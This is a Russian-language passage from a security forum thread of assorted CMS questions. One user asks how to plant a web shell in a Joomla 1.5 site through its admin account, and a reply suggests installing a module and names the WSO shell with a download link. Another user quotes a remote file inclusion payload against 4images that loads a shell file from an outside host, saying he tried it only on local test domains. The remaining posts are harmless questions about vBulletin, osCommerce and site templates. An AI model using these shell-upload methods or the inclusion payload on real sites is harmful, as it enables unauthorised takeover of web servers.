ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Приветствую, уважаемые форумчане.

Извините за идиотский вопрос, но как залить шелл в joomla v.1.5, если нет ни JoomlaXplorer, ни меню редактирования языков, при заливке в папку с картинками (media), пишет, что не правильное изображение (пробовал и 123.php и 123.php.jpg и 123.png), плюс к этому глобальный админ отключен, у меня аккаунт админа...

Кстати пишет, что запись в папку с картинками разрешена, но какой-то зловредный скрипт этому мешает.

Помогите, оч надо, а то решил шелами заняться (для общего развития), а тут такая засада...

Если папка modules вритабельна, ставим новый модуль.

Архив по ссылке.

Шелл : wso.

zalil.ru/upload/29460413

Вот чёрт, файл удалён. Завтра перезалью.

Посмотри права в templates. Не одним JoomlaXplorer'ом залитие обходится, смотри ещё модули.

А вот допустим сейчас вышла новая версия vBulletin 4.0 Publishing Suite что входит в неё?если я приобрету смогу ли я пользоватся первое время стабильной 3.8.6 а после перейти без проблем на 4?

Есть сайты на osCommerce (версия 2003г), пытался вставить в индекс и футер что-либо, никакой реакции, на странице это не отражается почему-то. Очищение файла или нарушение целостности кода сразу отражается на странице. Почему так может быть?

4images

Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link

Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.

Попробовал заюзать описанную уязвимость так

http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00

4images.local и shell.local - локальные домены.

Кроме надписи "Security violation" ничего не увидел.

Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.

Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо

Вообще вопрос не совсем по тематике...

Но рискну предположить, что где Flash-шаблон там настройки отображения зашиты в самом flash-файле или в xml-ки, а где CSS Static, то настройки не изменяемы либо в стандартном файле с расширением css. По-поводу языка - если ты покупаешь шаблон, то делай с ним что хошешь - разбирайся в исходниках.

а разбиратся тяжело?

Поставь пока бесплатный шаб, покрути там что по чем, если совсем в тягость будет. Обезопасишь себя от необдуманной траты средств.